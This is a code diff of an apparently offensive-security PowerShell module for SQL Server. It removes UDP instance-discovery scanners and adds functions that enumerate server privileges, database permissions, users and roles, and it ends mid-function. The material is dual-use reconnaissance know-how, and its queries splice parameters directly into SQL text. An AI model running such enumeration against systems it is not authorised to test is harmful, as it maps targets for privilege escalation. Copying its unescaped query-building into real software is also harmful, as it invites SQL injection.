$TblMgmtSQLServers | - Select-Object -Property ComputerName, Instance | - Sort-Object -Property ComputerName, Instance - $Tbl2 = $TblSQLServerSpns | - Select-Object -Property ComputerName, Instance | - Sort-Object -Property ComputerName, Instance - $Tbl3 = $Tbl1 + $Tbl2 - - $InstanceCount = $Tbl3.rows.count - Write-Verbose -Message "$InstanceCount instances were found." - $Tbl3 - } - else - { - $InstanceCount = $TblSQLServerSpns.rows.count - Write-Verbose -Message "$InstanceCount instances were found." - $TblSQLServerSpns - } + $TblAuditServerSpec } } -# ------------------------------------------- -# Function: Get-SQLInstanceLocal -# ------------------------------------------- +# ---------------------------------- +# Get-SQLServerPriv +# ---------------------------------- # Author: Scott Sutherland -Function Get-SQLInstanceLocal +Function Get-SQLServerPriv { <# .SYNOPSIS - Returns a list of the SQL Server instances found in the Windows registry for the local system. + Returns SQL Server login privilege information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER PermissionName + Permission name to filter for. .EXAMPLE - PS C:\> Get-SQLInstanceLocal + PS C:\> Get-SQLServerPriv -Instance SQLServer1\STANDARDDEV2014 -PermissionName IMPERSONATE - ComputerName : Computer1 - Instance : Computer1\SQLEXPRESS - ServiceDisplayName : SQL Server (SQLEXPRESS) - ServiceName : MSSQL$SQLEXPRESS - ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS - ServiceAccount : NT Service\MSSQL$SQLEXPRESS - State : Running + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + GranteeName : public + GrantorName : sa + PermissionClass : SERVER_PRINCIPAL + PermissionName : IMPERSONATE + PermissionState : GRANT + ObjectName : sa + ObjectType : SQL_LOGIN + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLServerPriv -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, - ComputerName : Computer1 - Instance : Computer1\STANDARDDEV2014 - ServiceDisplayName : SQL Server (STANDARDDEV2014) - ServiceName : MSSQL$STANDARDDEV2014 - ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\Binn\sqlservr.exe" -sSTANDARDDEV2014 - ServiceAccount : LocalSystem - State : Running + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, - ComputerName : Computer1 - Instance : Computer1 - ServiceDisplayName : SQL Server (MSSQLSERVER) - ServiceName : MSSQLSERVER - ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER - ServiceAccount : NT Service\MSSQLSERVER - State : Running + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Permission name.')] + [string]$PermissionName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) - #> Begin { # Table for output - $TblLocalInstances = New-Object -TypeName System.Data.DataTable - $null = $TblLocalInstances.Columns.Add('ComputerName') - $null = $TblLocalInstances.Columns.Add('Instance') - $null = $TblLocalInstances.Columns.Add('ServiceDisplayName') - $null = $TblLocalInstances.Columns.Add('ServiceName') - $null = $TblLocalInstances.Columns.Add('ServicePath') - $null = $TblLocalInstances.Columns.Add('ServiceAccount') - $null = $TblLocalInstances.Columns.Add('State') + $TblServerPrivs = New-Object -TypeName System.Data.DataTable + + # Setup $PermissionName filter + if($PermissionName) + { + $PermissionNameFilter = " WHERE PER.permission_name like '$PermissionName'" + } + else + { + $PermissionNameFilter = '' + } } Process { - # Grab SQL Server services for the server - $SqlServices = Get-SQLServiceLocal | Where-Object -FilterScript { - $_.ServicePath -like '*sqlservr.exe*' - } + # Note: Tables queried by this function typically require sysadmin privileges to get all rows. - # Add recrds to SQL Server instance table - $SqlServices | - ForEach-Object -Process { - # Parse Instance - $ComputerName = [string]$_.ComputerName - $DisplayName = [string]$_.ServiceDisplayName + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - if($DisplayName) + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) { - $Instance = $ComputerName + '\' +$DisplayName.split('(')[1].split(')')[0] - if($Instance -like '*\MSSQLSERVER') - { - $Instance = $ComputerName - } + Write-Verbose -Message "$Instance : Connection Success." } - else + } + else + { + if( -not $SuppressVerbose) { - $Instance = $ComputerName + Write-Verbose -Message "$Instance : Connection Failed." } - - # Add record - $null = $TblLocalInstances.Rows.Add( - [string]$_.ComputerName, - [string]$Instance, - [string]$_.ServiceDisplayName, - [string]$_.ServiceName, - [string]$_.ServicePath, - [string]$_.ServiceAccount, - [string]$_.ServiceState) + return } - } - - End - { - - # Status User - $LocalInstanceCount = $TblLocalInstances.rows.count - Write-Verbose -Message "$LocalInstanceCount local instances where found." + # Define Query + $Query = " SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + GRE.name as [GranteeName], + GRO.name as [GrantorName], + PER.class_desc as [PermissionClass], + PER.permission_name as [PermissionName], + PER.state_desc as [PermissionState], + COALESCE(PRC.name, EP.name, N'') as [ObjectName], + COALESCE(PRC.type_desc, EP.type_desc, N'') as [ObjectType] + FROM [sys].[server_permissions] as PER + INNER JOIN sys.server_principals as GRO + ON PER.grantor_principal_id = GRO.principal_id + INNER JOIN sys.server_principals as GRE + ON PER.grantee_principal_id = GRE.principal_id + LEFT JOIN sys.server_principals as PRC + ON PER.class = 101 AND PER.major_id = PRC.principal_id + LEFT JOIN sys.endpoints AS EP + ON PER.class = 105 AND PER.major_id = EP.endpoint_id + $PermissionNameFilter + ORDER BY GranteeName,PermissionName;" + + # Execute Query + $TblServerPrivsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append data as needed + $TblServerPrivs = $TblServerPrivs + $TblServerPrivsTemp + } + + End + { # Return data - $TblLocalInstances + $TblServerPrivs } } # ---------------------------------- -# Get-SQLInstanceScanUDP +# Get-SQLDatabasePriv # ---------------------------------- -# Author: Eric Gruber -# Note: Pipeline and timeout mods by Scott Sutherland -function Get-SQLInstanceScanUDP +# Author: Scott Sutherland +Function Get-SQLDatabasePriv { <# .SYNOPSIS - Returns a list of SQL Servers resulting from a UDP discovery scan of provided computers. - .PARAMETER ComputerName - Computer name or IP address to enumerate SQL Instance from. - .PARAMETER UDPTimeOut - Timeout in seconds. Longer timeout = more accurate. + Returns database user privilege information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER NoDefaults + Only select non default databases. + .PARAMETER PermissionName + Permission name to filter for. + .PARAMETER PermissionType + Permission type name to filter for. + .PARAMETER PrincipalName + Principal name to filter for. .EXAMPLE - PS C:\> Get-SQLInstanceScanUDP -Verbose -ComputerName SQLServer1.domain.com - VERBOSE: - SQLServer1.domain.com - UDP Scan Start. - VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. - - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com\Express - InstanceName : Express - ServerIP : 10.10.10.30 - TCPPort : 51663 - BaseVersion : 11.0.2100.60 - IsClustered : No + PS C:\> Get-SQLDatabasePriv -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -PermissionName "VIEW DEFINITION" - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com\Standard - InstanceName : Standard - ServerIP : 10.10.10.30 - TCPPort : 51861 - BaseVersion : 11.0.2100.60 - IsClustered : No + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + PrincipalName : createprocuser + PrincipalType : SQL_USER + PermissionType : SCHEMA + PermissionName : VIEW DEFINITION + StateDescription : GRANT + ObjectType : SCHEMA + ObjectName : dbo .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLInstanceScanUDP -Verbose - VERBOSE: - SQLServer1.domain.com - UDP Scan Start. - VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. + PS C:\> Get-SQLInstanceLocal | Get-SQLDatabasePriv -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com\Express - InstanceName : Express - ServerIP : 10.10.10.30 - TCPPort : 51663 - BaseVersion : 11.0.2100.60 - IsClustered : No + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com\Standard - InstanceName : Standard - ServerIP : 10.10.10.30 - TCPPort : 51861 - BaseVersion : 11.0.2100.60 - IsClustered : No - [TRUNCATED] - #> - [CmdletBinding()] - param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, - [Parameter(Mandatory = $true, - ValueFromPipeline, + [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Computer name or IP address to enumerate SQL Instance from.')] - [string]$ComputerName, + HelpMessage = 'SQL Server database name to filter for.')] + [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Timeout in seconds. Longer timeout = more accurate.')] - [int]$UDPTimeOut = 2, + HelpMessage = 'Permission name to filter for.')] + [string]$PermissionName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Permission type to filter for.')] + [string]$PermissionType, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Principal name for grantee to filter for.')] + [string]$PrincipalName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = "Don't select permissions for default databases.")] + [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -9043,187 +10741,206 @@ function Get-SQLInstanceScanUDP Begin { - # Setup data table for results - $TableResults = New-Object -TypeName system.Data.DataTable -ArgumentList 'Table' - $null = $TableResults.columns.add('ComputerName') - $null = $TableResults.columns.add('Instance') - $null = $TableResults.columns.add('InstanceName') - $null = $TableResults.columns.add('ServerIP') - $null = $TableResults.columns.add('TCPPort') - $null = $TableResults.columns.add('BaseVersion') - $null = $TableResults.columns.add('IsClustered') - } + # Table for output + $TblDatabasePrivs = New-Object -TypeName System.Data.DataTable - Process - { - if(-not $SuppressVerbose) + # Setup PermissionName filter + if($PermissionName) { - Write-Verbose -Message " - $ComputerName - UDP Scan Start." + $PermissionNameFilter = " and pm.permission_name like '$PermissionName'" + } + else + { + $PermissionNameFilter = '' } - # Verify server name isn't empty - if ($ComputerName -ne '') + # Setup PermissionName filter + if($PrincipalName) { - # Try to enumerate SQL Server instances from remote system - try - { - # Resolve IP - $IPAddress = [System.Net.Dns]::GetHostAddresses($ComputerName) + $PrincipalNameFilter = " and rp.name like '$PrincipalName'" + } + else + { + $PrincipalNameFilter = '' + } - # Create UDP client object - $UDPClient = New-Object -TypeName System.Net.Sockets.Udpclient + # Setup PermissionType filter + if($PermissionType) + { + $PermissionTypeFilter = " and pm.class_desc like '$PermissionType'" + } + else + { + $PermissionTypeFilter = '' + } + } - # Attempt to connect to system - $UDPTimeOutMilsec = $UDPTimeOut * 1000 - $UDPClient.client.ReceiveTimeout = $UDPTimeOutMilsec - $UDPClient.Connect($ComputerName,0x59a) - $UDPPacket = 0x03 + Process + { + # Note: Tables queried by this function typically require sysadmin privileges. - # Send request to system - $UDPEndpoint = New-Object -TypeName System.Net.Ipendpoint -ArgumentList ([System.Net.Ipaddress]::Any, 0) - $UDPClient.Client.Blocking = $true - [void]$UDPClient.Send($UDPPacket,$UDPPacket.Length) + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Process response from system - $BytesRecived = $UDPClient.Receive([ref]$UDPEndpoint) - $Response = [System.Text.Encoding]::ASCII.GetString($BytesRecived).split(';') + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } - $values = @{} + # Setup NoDefault filter + if($NoDefaults) + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + } + else + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + } - for($i = 0; $i -le $Response.length; $i++) - { - if(![string]::IsNullOrEmpty($Response[$i])) - { - $values.Add(($Response[$i].ToLower() -replace '[\W]', ''),$Response[$i+1]) - } - else - { - if(![string]::IsNullOrEmpty($values.'tcp')) - { - if(-not $SuppressVerbose) - { - $DiscoveredInstance = "$ComputerName\"+$values.'instancename' - Write-Verbose -Message "$ComputerName - Found: $DiscoveredInstance" - } + # Get the privs for each database + $TblDatabases | + ForEach-Object -Process { + # Set DatabaseName filter + $DbName = $_.DatabaseName - # Add SQL Server instance info to results table - $null = $TableResults.rows.Add( - [string]$ComputerName, - [string]"$ComputerName\"+$values.'instancename', - [string]$values.'instancename', - [string]$IPAddress, - [string]$values.'tcp', - [string]$values.'version', - [string]$values.'isclustered') - $values = @{} - } - } - } + # Define Query + $Query = " USE $DbName; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + '$DbName' as [DatabaseName], + rp.name as [PrincipalName], + rp.type_desc as [PrincipalType], + pm.class_desc as [PermissionType], + pm.permission_name as [PermissionName], + pm.state_desc as [StateDescription], + ObjectType = CASE + WHEN obj.type_desc IS NULL + OR obj.type_desc = 'SYSTEM_TABLE' THEN + pm.class_desc + ELSE + obj.type_desc + END, + [ObjectName] = Isnull(ss.name, Object_name(pm.major_id)) + FROM $DbName.sys.database_principals rp + INNER JOIN $DbName.sys.database_permissions pm + ON pm.grantee_principal_id = rp.principal_id + LEFT JOIN $DbName.sys.schemas ss + ON pm.major_id = ss.schema_id + LEFT JOIN $DbName.sys.objects obj + ON pm.[major_id] = obj.[object_id] WHERE 1=1 + $PermissionTypeFilter + $PermissionNameFilter + $PrincipalNameFilter" - # Close connection - $UDPClient.Close() - } - catch + # Execute Query + if(-not $SuppressVerbose) { - #"Error was $_" - #$line = $_.InvocationInfo.ScriptLineNumber - #"Error was in Line $line" - - # Close connection - # $UDPClient.Close() + Write-Verbose -Message "$Instance : Grabbing permissions for the $DbName database..." } - } - if(-not $SuppressVerbose) - { - Write-Verbose -Message " - $ComputerName - UDP Scan Complete." + + $TblDatabaseTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results + $TblDatabasePrivs = $TblDatabasePrivs + $TblDatabaseTemp } } End { - # Return Results - $TableResults + # Return data + $TblDatabasePrivs } } # ---------------------------------- -# Get-SQLInstanceScanUDPThreaded +# Get-SQLDatabaseUser # ---------------------------------- -# Author: Eric Gruber -# Note: Pipeline and timeout mods by Scott Sutherland -function Get-SQLInstanceScanUDPThreaded +# Author: Scott Sutherland +Function Get-SQLDatabaseUser { <# .SYNOPSIS - Returns a list of SQL Servers resulting from a UDP discovery scan of provided computers. - .PARAMETER ComputerName - Computer name or IP address to enumerate SQL Instance from. - .PARAMETER UDPTimeOut - Timeout in seconds. Longer timeout = more accurate. - .PARAMETER Threads - Number of concurrent host threads. - .EXAMPLE - PS C:\> Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1.domain.com - VERBOSE: - SQLServer1.domain.com - UDP Scan Start. - VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. + Returns database user information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER DatabaseUser + Database user to filter for. + .PARAMETER PrincipalName + Principal name to filter for. + .PARAMETER NoDefaults + Only show information for non default databases. - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com\Express - InstanceName : Express - ServerIP : 10.10.10.30 - TCPPort : 51663 - BaseVersion : 11.0.2100.60 - IsClustered : No + .EXAMPLE + PS C:\> Get-SQLDatabaseUser -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -PrincipalName evil - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com\Standard - InstanceName : Standard - ServerIP : 10.10.10.30 - TCPPort : 51861 - BaseVersion : 11.0.2100.60 - IsClustered : No + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + DatabaseUserId : 5 + DatabaseUser : evil + PrincipalSid : 3E26CA9124B4AE42ABF1BBF2523738CA + PrincipalName : evil + PrincipalType : SQL_USER + deault_schema_name : dbo + create_date : 04/22/2016 13:00:33 + is_fixed_role : False + [TRUNCATED] .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLInstanceScanUDP -Verbose -Threads 20 - VERBOSE: - SQLServer1.domain.com - UDP Scan Start. - VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. + PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseUser -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com\Express - InstanceName : Express - ServerIP : 10.10.10.30 - TCPPort : 51663 - BaseVersion : 11.0.2100.60 - IsClustered : No + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com\Standard - InstanceName : Standard - ServerIP : 10.10.10.30 - TCPPort : 51861 - BaseVersion : 11.0.2100.60 - IsClustered : No - [TRUNCATED] - #> + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, - [CmdletBinding()] - param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database name.')] + [string]$DatabaseName, - [Parameter(Mandatory = $true, - ValueFromPipeline, + [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Computer name or IP address to enumerate SQL Instance from.')] - [string]$ComputerName, + HelpMessage = 'Database user.')] + [string]$DatabaseUser, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Timeout in seconds. Longer timeout = more accurate.')] - [int]$UDPTimeOut = 2, + HelpMessage = 'Server login.')] + [string]$PrincipalName, [Parameter(Mandatory = $false, - HelpMessage = 'Number of threads.')] - [int]$Threads = 5, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Do not show database users associated with default databases.')] + [Switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -9232,259 +10949,9376 @@ function Get-SQLInstanceScanUDPThreaded Begin { - # Setup data table for results - $TableResults = New-Object -TypeName system.Data.DataTable -ArgumentList 'Table' - $null = $TableResults.columns.add('ComputerName') - $null = $TableResults.columns.add('Instance') - $null = $TableResults.columns.add('InstanceName') - $null = $TableResults.columns.add('ServerIP') - $null = $TableResults.columns.add('TCPPort') - $null = $TableResults.columns.add('BaseVersion') - $null = $TableResults.columns.add('IsClustered') - $TableResults.Clear() + # Table for output + $TblDatabaseUsers = New-Object -TypeName System.Data.DataTable + $null = $TblDatabaseUsers.Columns.Add('ComputerName') + $null = $TblDatabaseUsers.Columns.Add('Instance') + $null = $TblDatabaseUsers.Columns.Add('DatabaseName') + $null = $TblDatabaseUsers.Columns.Add('DatabaseUserId') + $null = $TblDatabaseUsers.Columns.Add('DatabaseUser') + $null = $TblDatabaseUsers.Columns.Add('PrincipalSid') + $null = $TblDatabaseUsers.Columns.Add('PrincipalName') + $null = $TblDatabaseUsers.Columns.Add('PrincipalType') + $null = $TblDatabaseUsers.Columns.Add('deault_schema_name') + $null = $TblDatabaseUsers.Columns.Add('create_date') + $null = $TblDatabaseUsers.Columns.Add('is_fixed_role') - # Setup data table for pipeline threading - $PipelineItems = New-Object -TypeName System.Data.DataTable + # Setup PrincipalName filter + if($PrincipalName) + { + $PrincipalNameFilter = " and b.name like '$PrincipalName'" + } + else + { + $PrincipalNameFilter = '' + } - # Ensure provide instance is processed - if($Instance) + # Setup DatabaseUser filter + if($DatabaseUser) { - $ProvideInstance = New-Object -TypeName PSObject -Property @{ - Instance = $Instance - } - $PipelineItems = $PipelineItems + $ProvideInstance + $DatabaseUserFilter = " and a.name like '$DatabaseUser'" + } + else + { + $DatabaseUserFilter = '' } } Process { - # Create list of pipeline items - $PipelineItems = $PipelineItems + $_ - } + # Note: Tables queried by this function typically require sysadmin or DBO privileges. - End - { - # Define code to be multi-threaded - $MyScriptBlock = { - $ComputerName = $_.ComputerName + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - if(-not $SuppressVerbose) - { - Write-Verbose -Message " - $ComputerName - UDP Scan Start." - } + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } - # Verify server name isn't empty - if ($ComputerName -ne '') + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) { - # Try to enumerate SQL Server instances from remote system - try - { - # Resolve IP - $IPAddress = [System.Net.Dns]::GetHostAddresses($ComputerName) - - # Create UDP client object - $UDPClient = New-Object -TypeName System.Net.Sockets.Udpclient - - # Attempt to connect to system - $UDPTimeOutMilsec = $UDPTimeOut * 1000 - $UDPClient.client.ReceiveTimeout = $UDPTimeOutMilsec - $UDPClient.Connect($ComputerName,0x59a) - $UDPPacket = 0x03 + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } - # Send request to system - $UDPEndpoint = New-Object -TypeName System.Net.Ipendpoint -ArgumentList ([System.Net.Ipaddress]::Any, 0) - $UDPClient.Client.Blocking = $true - [void]$UDPClient.Send($UDPPacket,$UDPPacket.Length) + # Get list of databases + if($NoDefaults) + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults + } + else + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose + } - # Process response from system - $BytesRecived = $UDPClient.Receive([ref]$UDPEndpoint) - $Response = [System.Text.Encoding]::ASCII.GetString($BytesRecived).split(';') + # Get the privs for each database + $TblDatabases | + ForEach-Object -Process { + # Set DatabaseName filter + $DbName = $_.DatabaseName - $values = @{} + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Grabbing database users from $DbName." + } - for($i = 0; $i -le $Response.length; $i++) - { - if(![string]::IsNullOrEmpty($Response[$i])) - { - $values.Add(($Response[$i].ToLower() -replace '[\W]', ''),$Response[$i+1]) - } - else - { - if(![string]::IsNullOrEmpty($values.'tcp')) - { - if(-not $SuppressVerbose) - { - $DiscoveredInstance = "$ComputerName\"+$values.'instancename' - Write-Verbose -Message " - $ComputerName - Found: $DiscoveredInstance" - } + # Define Query + $Query = " USE $DbName; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + '$DbName' as [DatabaseName], + a.principal_id as [DatabaseUserId], + a.name as [DatabaseUser], + a.sid as [PrincipalSid], + b.name as [PrincipalName], + a.type_desc as [PrincipalType], + default_schema_name, + a.create_date, + a.is_fixed_role + FROM [sys].[database_principals] a + LEFT JOIN [sys].[server_principals] b + ON a.sid = b.sid WHERE 1=1 + $DatabaseUserFilter + $PrincipalNameFilter" - # Add SQL Server instance info to results table - $null = $TableResults.rows.Add( - [string]$ComputerName, - [string]"$ComputerName\"+$values.'instancename', - [string]$values.'instancename', - [string]$IPAddress, - [string]$values.'tcp', - [string]$values.'version', - [string]$values.'isclustered') - $values = @{} - } - } - } + # Execute Query + $TblDatabaseUsersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - # Close connection - $UDPClient.Close() + # Update sid formatting for each entry and append results + $TblDatabaseUsersTemp | + ForEach-Object -Process { + # Convert SID to string + if($_.PrincipalSid.GetType() -eq [System.DBNull]) + { + $Sid = '' } - catch + else { - #"Error was $_" - #$line = $_.InvocationInfo.ScriptLineNumber - #"Error was in Line $line" - - # Close connection - # $UDPClient.Close() + # Format principal sid + $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') + if ($NewSid.length -le 10) + { + $Sid = [Convert]::ToInt32($NewSid,16) + } + else + { + $Sid = $NewSid + } } - } - if(-not $SuppressVerbose) - { - Write-Verbose -Message " - $ComputerName - UDP Scan End." + # Add results to table + $null = $TblDatabaseUsers.Rows.Add( + [string]$_.ComputerName, + [string]$_.Instance, + [string]$_.DatabaseName, + [string]$_.DatabaseUserId, + [string]$_.DatabaseUser, + $Sid, + [string]$_.PrincipalName, + [string]$_.PrincipalType, + [string]$_.default_schema_name, + [string]$_.create_date, + [string]$_.is_fixed_role) } } + } - # Run scriptblock using multi-threading - $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue - - return $TableResults + End + { + # Return data + $TblDatabaseUsers } } + # ---------------------------------- -# Get-SQLInstanceFile +# Get-SQLServerRole # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLInstanceFile +Function Get-SQLServerRole { <# .SYNOPSIS - Returns a list of SQL Server instances from a file. - One per line. Three instance formats supported: - 1 - computername - 2 - computername\instance - 3 - computername,1433 - .PARAMETER FilePath - Path to file containing instances. One per line. + Returns SQL Server role information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER RolePrincipalName + Role principal name to filter for. + .PARAMETER RoleOwner + Role owner name to filter for. .EXAMPLE - PS C:\> Get-SQLInstanceFile -Verbose -FilePath c:\temp\servers.txt - VERBOSE: Importing instances from file path. - VERBOSE: 3 instances where found in c:\temp\servers.txt. + PS C:\> Get-SQLServerRole -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 - ComputerName Instance - ------------ -------- - Computer1 Computer1\SQLEXPRESS - Computer1 Computer1\STANDARDDEV2014 - Computer1 Computer1 + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + RolePrincipalId : 2 + RolePrincipalSid : 2 + RolePrincipalName : public + RolePrincipalType : SERVER_ROLE + OwnerPrincipalId : 1 + OwnerPrincipalName : sa + is_disabled : False + is_fixed_role : False + create_date : 4/13/2009 12:59:06 PM + modify_Date : 4/13/2009 12:59:06 PM + default_database_name : + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLServerRole -Verbose #> [CmdletBinding()] Param( - [Parameter(Mandatory = $true, - HelpMessage = 'The file path.')] - [string]$FilePath + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Role name.')] + 